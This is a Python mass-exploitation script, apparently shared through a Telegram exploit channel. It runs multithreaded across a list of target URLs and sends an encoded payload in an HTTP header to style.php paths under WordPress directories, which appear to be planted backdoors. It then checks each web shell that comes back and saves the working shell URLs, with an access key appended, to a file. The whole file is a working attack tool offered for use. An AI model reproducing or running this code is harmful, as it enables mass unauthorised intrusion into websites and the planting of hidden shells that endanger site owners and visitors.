import requests import concurrent.futures import threading import sys from urllib.parse import urljoin from colorama import Fore, Style, init #Telegram: # https://t.me/Exploit_0x init() lock = threading.Lock() def send_payload(url, payload): try: response = requests.get(url, headers={"P": payload["p"]}, timeout=10) response.raise_for_status() data = response.json() return data["data"]["beimaurl"] except Exception: return None def verify_shell(shell_url): try: response = requests.get(shell_url, timeout=10) response.raise_for_status() if "404 Not Found" in response.text: return True except Exception: return False return False def get_base_url(url): """Extract base URL by removing any style.php path and trailing slashes""" # Remove any style.php path for path in ['/style.php','/wp-content/style.php', '/wp-admin/style.php','/wp-includes/style.php', '/wp-content/themes/style.php']: if path in url: url = url.split(path)[0] # Remove trailing slashes return url.rstrip('/') def process_url(target_url, payload): base_url = get_base_url(target_url) # List of paths to try paths_to_try = [ '/style.php', '/wp-content/style.php', '/wp-admin/style.php', '/wp-includes/style.php', '/wp-content/themes/style.php' ] for path in paths_to_try: url_to_try = base_url + path try: shell_path = send_payload(url_to_try, payload) if not shell_path: continue # Construct shell URL using urljoin to handle relative paths correctly shell_url = urljoin(base_url + '/', shell_path) if verify_shell(shell_url): return (shell_url, None) except Exception: continue # If all paths failed return (None, base_url) def main(): if len(sys.argv) != 2: print(f"{Fore.RED}Usage: python {sys.argv[0]} list.txt{Style.RESET_ALL}") sys.exit(1) input_file = sys.argv[1] payload = { 'p': 'bvQWrfWtQebClOv6JkS/h5263NxZLbDBMdHJx4WQYfOrwS/5OcfbYUP5aKEE2juMeWAG9b/s6p3%2Bx6210abfrkwZCLPRtWmdkJ/r0/EwWWDncxv6n5LQ1wvWq%2BInEw2TeD/MOEtvMViiu7vYUyQ92H1ZrW/fMlaJKhTAdJdVJHKkheOpLuiWD0ebCixhIcRstT1a8GhB5ldZ5juHzicEXJQ68BfX19bXK5fSpNbAfEJtZs/XH/6LbIEdFLbQmmpG4MQyX/jA2/B7W24SBbfBnVYveMIU/IQ6o6%2BRiolgFE5uc2xuEZZ83sfEMdJKIkerfJZoJ1XjW8KIE/WJsWQ1HA%3D%3D' } try: with open(input_file, 'r', encoding='utf-8') as fp: urls = fp.read().splitlines() Exploit_Successful_count = 0 failed_count = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=15) as executor: future_to_url = {executor.submit(process_url, url, payload): url for url in urls} for future in concurrent.futures.as_completed(future_to_url): url = future_to_url[future] try: result = future.result() if result[0]: # Exploit_Successful case with lock: with open('Exploit_Successful.txt', 'a', encoding='utf-8') as f: f.write(result[0] +'?key=professor' + '\n') print(f"{Fore.GREEN}-| {result[0]} --> [Exploit_Successful]{Style.RESET_ALL}") Exploit_Successful_count += 1 else: # Failed case print(f"{Fore.RED}-| {result[1]} --> [Failed]{Style.RESET_ALL}") failed_count += 1 except Exception as e: base_url = get_base_url(url) print(f"{Fore.RED}-| {base_url} --> [Failed: {e}]{Style.RESET_ALL}") failed_count += 1 except FileNotFoundError: print(f"{Fore.RED}Error: File '{input_file}' not found.{Style.RESET_ALL}") sys.exit(1) except Exception as e: print(f"{Fore.RED}An unexpected error occurred: {e}{Style.RESET_ALL}") if __name__ == "__main__": main()